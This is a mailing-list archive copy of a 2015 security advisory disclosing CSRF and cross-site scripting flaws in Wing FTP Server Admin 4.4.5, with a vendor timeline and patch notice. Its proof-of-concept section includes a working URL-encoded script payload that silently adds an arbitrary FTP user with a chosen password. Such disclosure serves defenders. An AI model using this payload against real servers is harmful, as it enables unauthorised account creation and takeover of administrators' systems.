[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: CSRF & XSS Wing FTP Server Admin <= v4.4.5
From: apparitionsec () gmail ! com
Date: 2015-04-28 17:04:12
Message-ID: 201504281704.t3SH4CYR009391 () sf01web3 ! securityfocus ! com
[Download RAW message or body]
Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities
Release Date:
=============
2015-04-28
Source:
====================================
http://hyp3rlinx.altervista.org/advisories/AS-WFTP0328.txt
Common Vulnerability Scoring System:
====================================
Overall CVSS Score 8.9
Product:
===============================
Wing FTP Server is a Web based administration FTP client that supports following \
protocols FTP, FTPS, HTTPS, SSH
Advisory Information:
==============================
CSRF & client-side cross site scripting web vulnerability within Wing FTP Server \
Admin that allows adding arbitrary users to the system.
Vulnerability Disclosure Timeline:
==================================
March 28, 2015: Vendor Notification
March 28, 2015: Vendor Response/Feedback
April 19, 2015: Vendor Notification
April 28, 2015: Vendor released new version 4.4.6
April 28, 2015: Public Disclosure - John Page
Affected Product(s):
====================
Wing FTP Server Admin 4.4.5
Product: Wing FTP Server - Admin
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
Request Method(s):
[+] POST & GET
Vulnerable Product:
[+] Wing FTP Server Admin <= 4.4.5
Vulnerable Parameter(s):
[+] domain & type
Affected Area(s):
[+] Server Admin
Proof of Concept (POC):
=======================
The CSRF and client-side cross site scripting web vulnerability can be exploited by \
remote attackers without privileged application user account and with low user \
interaction (click). Payload will add arbitrary users to the system.
PoC: Example
http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES]
POC: Add arbitrary user:
http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_add \
user%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a% \
27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27% \
3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27m \
ax_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%2 \
7,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a \
0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_d \
ownload%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enab \
le_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quot \
a%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27, \
%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemas
ks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27en \
able_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_en \
able_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27 \
limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27 \
%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27, \
%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pub \
key_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E
POC XSS:
http://localhost:5466/admin_viewstatus.html?domain=[XSS VECTOR]
POC XSS:
http://localhost:5466/admin_event_list.html?type=[XSS VECTOR]
Solution - Fix & Patch:
=======================
Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server)
Security Risk:
==============
The security risk of the CSRF client-side cross site scripting web vulnerability in \
the `domain` admin_loglist.html value has CVSS Score of 8.9
Credits & Authors:
==================
John Page ( hyp3rlinx ) @apparitionsec
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
the security research reporter John Page disclaims all warranties, either expressed \
or implied, including the warranties of merchantability and capability for a \
particular purpose. apparitionsec or its suppliers are not liable in any case of \
damage, including direct, indirect, incidental, consequential loss of business \
profits or special damages.
Domains: hyp3rlinx.altervista.org
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic